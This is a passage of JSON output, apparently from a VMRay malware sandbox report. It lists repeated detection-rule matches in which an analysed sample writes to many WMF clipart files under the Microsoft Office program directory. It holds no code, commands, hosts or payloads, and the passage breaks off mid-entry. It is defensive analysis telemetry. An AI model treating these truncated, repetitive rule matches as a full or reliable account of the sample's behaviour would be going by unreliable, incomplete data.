"ref_id": "gfn_36936", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188513.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188519.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36943", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188519.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36950", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36957", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188669.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36964", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188669.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188679.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36973", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188679.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195248.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36980", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195248.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195254.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36987", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195254.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195260.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36994", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195260.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195320.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37001", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195320.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195342.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37010", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195342.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195428.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37019", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195428.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195772.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37028", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195772.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195788.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37035", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195788.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196060.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37042", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196060.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196110.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37049", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196110.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196142.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37056", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196142.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196354.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37063", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196354.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196358.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196358.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37070", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196358.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196364.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196364.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37077", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196364.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197979.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37084", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197979.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197983.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37095", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197983.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198016.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37104", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198016.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198020.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37115", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198020.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198021.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37124", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198021.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198022.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37135", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198022.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198025.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198025.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37144", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198025.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198102.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37151", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198102.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198113.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37164", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198113.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198226.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37175", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198226.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198234.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37186", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198234.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198372.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37197", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198372.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198377.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37206", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198377.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 